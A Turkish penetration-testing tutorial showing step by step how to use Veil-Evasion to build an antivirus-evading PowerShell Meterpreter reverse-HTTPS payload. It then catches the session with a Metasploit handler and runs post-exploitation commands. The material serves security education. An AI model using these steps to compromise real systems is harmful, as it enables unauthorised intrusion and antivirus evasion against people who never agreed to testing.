Kali Üzerinde Veil-Evasion Aracı Kullanılarak Zararlı Betik Dosyası Oluşturma

Sızma testleri sırasında anti-virüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır. Bu yazıda, Veil adlı anaçatının bir üyesi olan Veil-Evasion aracı kullanılarak antivirüslere yakalanmayan zararlı bir betik dosyası oluşturulacaktır.

Veil-Evasion aracı kurulu bir Kali bilgisayarda Veil-Evasion kurulum dizini (/root/Veil/Veil-Evasion/ gibi) içerisindeki python betiği çalıştırılarak zararlı yazılım oluşturulabilir.

ls
./Veil-Evasion.py

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-01

Betik çalıştırıldıktan sonra, tüm payload çeşitleri listelenebilir.

list

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-02

Şubat 2015 itibari ile yayında olan Veil-Evasion veritabanında 39 adet payload bulunduğu görülmektedir.
evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-03

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-04

Veil-Evasion komut satırında “info” komutundan sonra payload adı veya payload ID değeri girilerek payload hakkında ayrıntılı bilgi edinilebilir.

info 17
info powershell/meterpreter/rev_https

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-05

Veil-Evasion komut satırında direk olarak payload ID değeri girilerek, “use” komutundan sonra payload adı veya payload ID değeri girilerek kullanılmak istenen payload seçilebilir.

17
use 17
use powershell/meterpreter/rev_https

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-06

Seçilen payload parametreleri ayarlanarak, payload oluşturulmasına başlanabilir.

set LHOST 192.168.244.146
set LPORT 443
generate

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-07

Veil-Evasion ile oluşturulan dosyaya isim verilir.

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-08

Oluşan betik dosyası /usr/share/veil-evasion/compiled dizinine kayıt edilmiştir.

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-09

Betik dosyasının içeriğinde bir powershell betiği olduğu görülmektedir.

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-10

Ayrıca “/usr/share/veil-evasion/handlers” dizinine bir kaynak dosyası (resource file) kayıt edilmiştir.

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-11

Bu dosyanın içeriğinde MSF multi-handler istismar modülüne ait seçeneklerin bulunduğu görülmektedir.

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-12

Hazırlanan zararlı uygulama VirusTotal ile taratıldığında 57 antivirüsten 10 tanesi tarafından tespit edilebileceği görülmektedir.

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-13

İpucu: Çok etkin bir sonuc vermese de “/usr/share/veil-evasion” dizini altındaki “hashes.txt” dosyası içerisinde oluşan dosyanın özet değeri bulunmaktadır. Bu değer VirusTotal’e verilerek veya Veil-Evasion komut satırındaki “checkvt” komutuna verilerek antivirüsler tarafından daha önceden tespit edilip edilmediği incelenebilir.

checkvt 7cdf8a5b3be020d56a248c56809a3db055129ea3

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-14

Hazırlanan zararlı uygulama çalıştırıldığında, bir talep oluşacaktır. Bu talebin yakalanması için bir MSF multi-handler oluşturulur ve beklenir.

use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.244.146
set LPORT 443
set ExitOnSession false
exploit -j -z

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-15

Zararlı yazılım Windows bir işletim sistemi çalıştırıldığında, Meterpreter bağlantı talebinin MSF multi-handler istismar modülü tarafından yakalandığı görülmektedir.

sessions

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-16

Hazırlanan payload ile kullanıcı hakları ile yeni bir proses oluştuğu görülmektedir.

sessions -i 1
getuid
getpid
ps -U Yonetici

evading-anti-virus-detection-for-scripts-using-veil-evasion-tool-17

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.